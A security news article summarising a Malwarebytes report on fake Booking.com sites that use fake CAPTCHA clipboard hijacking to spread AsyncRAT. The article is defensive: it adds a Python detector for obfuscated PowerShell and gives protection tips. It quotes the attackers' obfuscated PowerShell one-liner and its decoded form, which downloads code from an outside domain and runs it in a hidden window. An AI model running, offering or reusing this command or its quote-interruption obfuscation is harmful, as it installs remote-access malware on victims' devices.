Cybercriminals Launch Fake Booking.com Sites to Spread AsyncRAT Malware
Discover how cybercriminals are using fake Booking.com sites to distribute AsyncRAT malware and how to protect yourself from this threat.
TL;DR
Cybercriminals are redirecting users to fake Booking.com sites to spread AsyncRAT malware. This campaign exploits fake CAPTCHA forms to hijack clipboards and trick users into executing malicious commands. Protect yourself by being cautious with online links and using reliable anti-malware solutions.
Introduction
Cybercriminals have launched a new campaign involving fake Booking.com websites to distribute the AsyncRAT malware. According to Malwarebytes, this is a major threat affecting a significant number of people. In this article, we will delve into the details of this campaign, how it operates, and the necessary steps to protect yourself.
Understanding the Threat
Campaign Overview
Cybercriminals are redirecting users to fake Booking.com sites through links placed on gaming websites, social media, and sponsored ads. This campaign, which began in mid-May, capitalizes on the fact that 40% of travel bookings are made through general online searches, providing ample opportunities for scammers.
Redirection and Fake CAPTCHA Strategy
The fake sites employ a familiar strategy where fake CAPTCHA forms hijack the user’s clipboard. These forms trick visitors into executing malicious commands on their devices. The redirection destinations change every two to three days, making it difficult to track and block these malicious sites.
Malicious Commands and Clipboard Hijacking
Interacting with the fake CAPTCHA form allows the website to copy a malicious command to the user’s clipboard. This command is obfuscated with mixed casing and double quotes inserted mid-word (the Windows command-line parser strips those quotes before PowerShell sees the text), and is designed to open a hidden PowerShell window and download the AsyncRAT malware.
pOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'b"kn"g"n"et.com';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v"
When decoded, the command executes the following:
powershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv"
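As an added example (not code from the Malwarebytes report), the function below reproduces the decoding shown above for command lines taken from process-creation logs: it drops the inserted double quotes, expands abbreviated powershell.exe switches, and then flags the hidden-window / Invoke-RestMethod / Invoke-Expression combination. The indicator names, the `PARAMS` list and the benign sample are my own assumptions.

```python
import re

# Dashes that powershell.exe accepts as a parameter prefix, mapped to "-" (the
# page's sample uses an en dash before its first switch).
DASHES = str.maketrans({"\u2013": "-", "\u2014": "-", "\u2212": "-"})

# powershell.exe parameters this normalizer expands; any unambiguous prefix is accepted (-nop, -NoPro, /w).
PARAMS = ("noprofile", "windowstyle", "command", "encodedcommand", "noninteractive", "executionpolicy")

INDICATORS = [
    ("hidden_window", re.compile(r"-windowstyle hidden", re.I)),
    ("no_profile", re.compile(r"-noprofile", re.I)),
    ("remote_fetch", re.compile(
        r"\b(invoke-restmethod|invoke-webrequest|irm|iwr|downloadstring)\b", re.I)),
    ("dynamic_eval", re.compile(r"\b(invoke-expression|iex)\b", re.I)),
]


def normalize_cmdline(cmdline: str) -> str:
    """Undo quote interruption and switch abbreviation in a powershell.exe command line."""
    # Windows argument parsing discards bare double quotes, so I"n"v"oke reaches
    # PowerShell as Invoke; reproduce that before matching anything.
    tokens = cmdline.translate(DASHES).replace('"', "").split()
    out = []
    for i, tok in enumerate(tokens):
        if i == 0:
            tok = tok.lower()                      # pOwERsheLl -> powershell
        elif tok[0] in "-/" and len(tok) > 1:
            matches = [p for p in PARAMS if p.startswith(tok[1:].lower())]
            if len(matches) == 1:                  # -NoPro -> -noprofile, /w -> -windowstyle
                tok = "-" + matches[0]
        elif out and out[-1] == "-windowstyle" and "hidden".startswith(tok.lower()):
            tok = "hidden"                         # h -> hidden
        out.append(tok)
    return " ".join(out)


def analyze(cmdline: str) -> dict:
    """Return the normalized command line and the fake-CAPTCHA-style indicators it trips."""
    norm = normalize_cmdline(cmdline)
    hits = [name for name, rx in INDICATORS if rx.search(norm)]
    # A double quote wedged between two non-space characters is the quote-interruption
    # signature itself; several of them in one command line is not normal usage.
    if len(re.findall(r'\S"(?=\S)', cmdline)) >= 3:
        hits.append("quote_interruption")
    return {"normalized": norm, "indicators": hits, "suspicious": len(hits) >= 3}


# Constructed inputs: the page's obfuscated command and a benign admin command line.
OBFUSCATED = ('pOwERsheLl \u2013N"O"p"rO" /w h -C"Om"ManD "$b"a"np = \'b"kn"g"n"et.com\';'
              '$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v"')
BENIGN = 'powershell.exe -NoProfile -Command "Get-Date"'
```

Running `analyze(OBFUSCATED)` yields the decoded command shown above plus five indicators, while the benign line trips only `no_profile`.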
Malware Execution and Impact
If executed, the command downloads and runs ckjg.exe, which in turn downloads Stub.exe, detected as Backdoor.AsyncRAT. This malware allows cybercriminals to remotely monitor and control infected devices, leading to potential financial damages and identity theft.
Protection Measures
Browser Warnings and Protections
Users of Chrome may see a warning when attempting to copy the malicious command, but the warning might not be clear. Malwarebytes Browser Guard provides a more explicit warning, alerting users that their clipboard has been accessed.
Malwarebytes Browser Guard’s clipboard warning
Preventive Steps
To protect yourself from this threat, consider the following steps:
- Be Cautious: Do not follow instructions from unknown websites without careful consideration.
- Use Anti-Malware Solutions: Employ active anti-malware tools that block malicious websites and scripts.
- Browser Extensions: Utilize browser extensions that block malicious domains and scams.
- Disable JavaScript: Disable JavaScript in your browser before visiting unknown websites to prevent clipboard access.
Indicators of Compromise (IOCs)
The domains associated with this campaign rotate frequently; the recently active domains are listed in the Malwarebytes report.
Malwarebytes blocks the download from bkngnet[.]com
Conclusion
The threat posed by fake Booking.com sites distributing AsyncRAT malware underscores the importance of vigilance and proactive security measures. By being cautious with online links and using reliable anti-malware solutions, you can protect yourself from this and similar threats. Stay informed and take the necessary steps to safeguard your digital identity.
For more details, see the full Malwarebytes article.